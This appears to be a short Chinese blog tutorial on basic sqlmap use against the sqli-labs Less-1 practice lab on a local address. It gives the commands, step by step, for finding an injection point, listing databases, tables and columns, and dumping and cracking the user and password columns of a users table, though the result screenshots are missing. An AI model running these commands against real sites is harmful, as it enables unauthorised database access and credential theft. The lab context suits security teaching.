sqlmap基础使用(以sqli—labs第一关为例)

一、基础测试有哪些漏洞

命令:sqlmap.py -u "url"

语句:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1"

结果:

 

 

 二、爆出所有数据库命令

命令:sqlmap.py -u "url" --dbs

语句:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" --dbs

结果:

 

 

 三、爆指定数据库的表名

命令:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D 指定数据库名称  --tables

语句:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D dvwa --tables

 

 

 四、爆指定表中字段

命令:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D 指定数据库名称  -T 指定表的名称  --columns

语句:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D  dvwa   -T  users  --columns

结果:

 五、爆字段内容

命令:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D 指定数据库名称  -T 指定表的名称  -C  user,password  --dump

语句:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D dvwa  -T users  -C  user,password  --dump

注:这个应该password输出的是数字与字母混合的字符串,由于在输入上面语句的过程中,我在这里选择了yes,顺带着给解密了

结果:

还没完,今日先到这~~~

posted @ 2020-04-29 20:26  ApricityJ  阅读(1101)  评论(0编辑  收藏  举报